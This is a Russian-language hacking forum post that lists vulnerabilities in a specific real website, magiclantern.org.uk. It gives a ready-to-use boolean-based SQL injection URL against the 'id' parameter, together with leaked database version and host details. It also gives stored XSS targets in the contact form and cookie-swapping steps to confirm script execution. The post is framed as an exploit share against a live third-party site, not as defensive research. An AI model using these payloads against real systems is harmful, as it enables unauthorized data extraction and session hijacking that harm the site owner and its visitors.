Показать сообщение отдельно

  #267  
Старый 21.05.2017, 23:26
Печа
Познающий
Регистрация: 09.05.2015
Сообщений: 40
С нами: 5797046

Репутация: 17
По умолчанию

Сайт: magiclantern.org.uk

Boolean Based SQL Injection черз GET, уязвимый параметр id

5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1

Если есть пост с заголовком The Temple of Minerva "true"

Если нет поста с заголовком The Temple of Minerva "false"

Эксплоит:

Код:
http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
Stored XSS:

Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject

Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере

Код:
URL:http://www.magiclantern.org.uk/contact.php
payload: ">
Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот

Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,

например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk

в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
 
Ответить с цитированием